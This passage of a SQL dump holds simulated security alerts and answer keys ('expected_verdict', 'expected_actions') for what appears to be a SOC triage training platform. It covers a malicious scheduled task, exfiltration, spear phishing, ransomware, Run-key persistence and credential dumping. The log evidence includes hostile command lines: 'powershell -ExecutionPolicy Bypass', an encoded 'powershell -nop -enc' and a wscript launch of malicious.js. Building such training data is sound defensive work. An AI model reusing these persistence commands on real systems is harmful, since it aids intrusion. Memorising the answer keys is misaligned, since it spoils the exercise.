malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"193.104.68.132\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actors.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.711Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"task_arguments\\\":\\\"-ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\update.ps1\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_next_run_time\\\":\\\"2023-10-10T03:00:00Z\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"193.104.68.132\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"task_creator\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"timestamp\\\":\\\"2023-10-07T08:15:00Z\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.711Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"task_arguments\\\":\\\"-ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\update.ps1\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_next_run_time\\\":\\\"2023-10-10T03:00:00Z\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"193.104.68.132\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"task_creator\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"timestamp\\\":\\\"2023-10-07T08:15:00Z\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.711Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"task_arguments\\\":\\\"-ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\update.ps1\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_next_run_time\\\":\\\"2023-10-10T03:00:00Z\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"193.104.68.132\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"task_creator\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"timestamp\\\":\\\"2023-10-07T08:15:00Z\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.711Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"task_arguments\\\":\\\"-ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\update.ps1\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_next_run_time\\\":\\\"2023-10-10T03:00:00Z\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"193.104.68.132\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"task_creator\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"timestamp\\\":\\\"2023-10-07T08:15:00Z\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.711Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Update\\\\\\\\CriticalUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe\\\",\\\"task_arguments\\\":\\\"-ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\update.ps1\\\",\\\"task_trigger\\\":\\\"Daily\\\",\\\"task_next_run_time\\\":\\\"2023-10-10T03:00:00Z\\\",\\\"task_user\\\":\\\"SYSTEM\\\",\\\"source_ip\\\":\\\"193.104.68.132\\\",\\\"username\\\":\\\"SYSTEM\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"task_creator\\\":\\\"NT AUTHORITY\\\\\\\\SYSTEM\\\",\\\"timestamp\\\":\\\"2023-10-07T08:15:00Z\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1604, 'Lateral Movement: Unauthorized Access Detected', 'high', 'Network Traffic Analysis', 'Detected unauthorized lateral movement using stolen credentials from compromised user accounts, aimed at accessing critical systems in the education institute\'s network.', 'Credential Dumping', 'T1003', 1, 'new', 283, '{\"timestamp\":\"2023-10-20T14:22:58Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.0.15\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"file_accessed\":\"C:\\\\Windows\\\\System32\\\\config\\\\SAM\",\"hash\":\"c8b7b5a5d0f6aae6d1e8a3f1f0c9a7d3\",\"event_type\":\"credential_dumping\",\"additional_info\":{\"tools_used\":[\"mimikatz\"],\"successful_logins\":[\"10.0.0.15\"],\"failed_attempts\":3}}', '2026-03-15 19:17:34', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Destination IP address for unauthorized access.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP address.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"c8b7b5a5d0f6aae6d1e8a3f1f0c9a7d3\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz tool 
usage.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1605, 'Exfiltration: Data Transfer to External Server', 'critical', 'Outbound Firewall Logs', 'Sensitive data, including student records and patient information, was transferred to a remote server controlled by the attackers. The operation suggests an advanced level of sophistication, indicating the possible involvement of an APT group.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"action\":\"ALLOW\",\"username\":\"jdoe\",\"filename\":\"student_records_q3_2023.zip\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"data_size\":\"150MB\"}', '2026-03-15 19:17:34', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious IP database\",\"verdict\":\"malicious\",\"details\":\"IP address known for hosting malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"student_records_q3_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive information.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash lookup\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with recent data leaks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1606, 'Initial Access: Spear Phishing Email Detected', 'high', 'Email Server Logs', 'A spear phishing campaign targeting key personnel in the municipality was detected. The attacker sent a well-crafted email with a malicious attachment aiming to gain entry into the network.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:23Z\",\"email_id\":\"2e4b54a1c3b548f5a1f0e3e4\",\"from\":\"finance_department@municipal.gov\",\"to\":\"john.doe@municipal.gov\",\"subject\":\"Urgent: Q4 Financial Summary\",\"attachment\":{\"filename\":\"Q4_Financial_Summary.pdf.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"size\":\"512000\"},\"ip_source\":\"203.0.113.45\",\"ip_destination\":\"10.0.5.23\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"delivery_status\":\"delivered\"}', '2026-03-15 19:18:01', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing server.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malware by multiple engines.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"finance_department@municipal.gov\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Email Reputation\",\"verdict\":\"suspicious\",\"details\":\"Email address spoofed.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Q4_Financial_Summary.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable disguised as PDF.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Spear Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.717Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1607, 'Execution: Malicious Payload Activation', 'critical', 'Endpoint Detection and Response (EDR)', 'The ransomware payload has been executed on the target\'s system, initiating the encryption of files and demanding ransom payment.', 'Malware Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"EDR-20231015-00042\",\"system\":\"INTERNAL_HOST_01\",\"user\":\"jdoe\",\"process\":{\"name\":\"ransomware.exe\",\"hash\":\"3f7c3ab5d4e6f8a9708b3e8f0e7c0a42\",\"pid\":3480},\"source_ip\":\"10.50.60.70\",\"destination_ip\":\"192.168.1.102\",\"attacker_ip\":\"198.51.100.23\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\ransomware.exe\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\ransomware.exe /encrypt\",\"indicators\":[{\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true},{\"type\":\"hash\",\"value\":\"3f7c3ab5d4e6f8a9708b3e8f0e7c0a42\",\"is_critical\":true},{\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":true}]}', '2026-03-15 19:18:01', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f7c3ab5d4e6f8a9708b3e8f0e7c0a42\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"suspicious\",\"details\":\"Unusual filename observed in recent incidents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1608, 'Persistence: Registry Key Modification', 'high', 'Windows Registry Logs', 'The ransomware modifies registry keys to establish persistence, allowing it to reload automatically when the system is restarted. This modification is an indication of a sophisticated persistence mechanism used by the attacker to ensure their malware remains active even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:23Z\",\"event_id\":4657,\"user\":\"SYSTEM\",\"computer_name\":\"DESKTOP-01\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousEntry\",\"operation\":\"Registry Key Modification\",\"old_value\":\"\",\"new_value\":\"rundll32.exe C:\\\\Windows\\\\System32\\\\wscript.exe //E:javascript C:\\\\Windows\\\\Temp\\\\malicious.js\",\"host_ip\":\"10.0.0.5\",\"attacker_ip\":\"45.76.123.89\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious.js\"}', '2026-03-15 19:18:01', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.123.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"This IP has been associated with ransomware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"This hash is linked to a known ransomware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"The file is a JavaScript used in ransomware 
delivery.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"SYSTEM\\\",\\\"computer_name\\\":\\\"DESKTOP-01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"operation\\\":\\\"Registry Key Modification\\\",\\\"old_value\\\":\\\"\\\",\\\"new_value\\\":\\\"rundll32.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //E:javascript C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious.js\\\",\\\"host_ip\\\":\\\"10.0.0.5\\\",\\\"attacker_ip\\\":\\\"45.76.123.89\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious.js\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"SYSTEM\\\",\\\"computer_name\\\":\\\"DESKTOP-01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"operation\\\":\\\"Registry Key Modification\\\",\\\"old_value\\\":\\\"\\\",\\\"new_value\\\":\\\"rundll32.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //E:javascript 
C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious.js\\\",\\\"host_ip\\\":\\\"10.0.0.5\\\",\\\"attacker_ip\\\":\\\"45.76.123.89\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious.js\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"SYSTEM\\\",\\\"computer_name\\\":\\\"DESKTOP-01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"operation\\\":\\\"Registry Key Modification\\\",\\\"old_value\\\":\\\"\\\",\\\"new_value\\\":\\\"rundll32.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //E:javascript C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious.js\\\",\\\"host_ip\\\":\\\"10.0.0.5\\\",\\\"attacker_ip\\\":\\\"45.76.123.89\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious.js\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"SYSTEM\\\",\\\"computer_name\\\":\\\"DESKTOP-01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"operation\\\":\\\"Registry Key Modification\\\",\\\"old_value\\\":\\\"\\\",\\\"new_value\\\":\\\"rundll32.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //E:javascript 
C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious.js\\\",\\\"host_ip\\\":\\\"10.0.0.5\\\",\\\"attacker_ip\\\":\\\"45.76.123.89\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious.js\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"SYSTEM\\\",\\\"computer_name\\\":\\\"DESKTOP-01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousEntry\\\",\\\"operation\\\":\\\"Registry Key Modification\\\",\\\"old_value\\\":\\\"\\\",\\\"new_value\\\":\\\"rundll32.exe C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //E:javascript C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\malicious.js\\\",\\\"host_ip\\\":\\\"10.0.0.5\\\",\\\"attacker_ip\\\":\\\"45.76.123.89\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious.js\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1609, 'Lateral Movement: Credential Dumping Detected', 'critical', 'Security Information and Event Management (SIEM)', 'A credential dumping activity was detected originating from a potentially compromised host within the network. The adversary is attempting to obtain credentials to facilitate lateral movement across the critical infrastructure network. Immediate action is required.', 'Credential Access', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:25:45Z\",\"event_id\":\"4634\",\"source_ip\":\"45.76.23.94\",\"internal_ip\":\"192.168.1.102\",\"target_username\":\"admin_user\",\"process_name\":\"lsass.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"mimikatz.exe\",\"event_description\":\"Credential dumping attempt detected from process mimikatz.exe targeting lsass.exe.\",\"severity\":\"Critical\"}', '2026-03-15 19:18:01', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.23.94\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with credential dumping activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the potentially compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the Mimikatz credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Executable file commonly used for credential 
dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Privileged account targeted for dumping credentials.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.723Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 